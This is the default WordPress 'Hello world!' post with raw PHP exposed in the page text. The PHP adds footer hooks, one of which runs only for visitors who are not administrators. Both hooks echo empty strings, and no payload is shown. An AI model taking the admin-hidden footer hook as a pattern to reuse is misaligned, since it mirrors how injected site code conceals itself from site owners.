Hello world!
|0 Comment
Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!
add_action('wp_footer', function(){ echo '
'; }); function custom_footer() { if(!is_admin()) { echo ''; } } add_action('wp_footer', 'custom_footer', 100);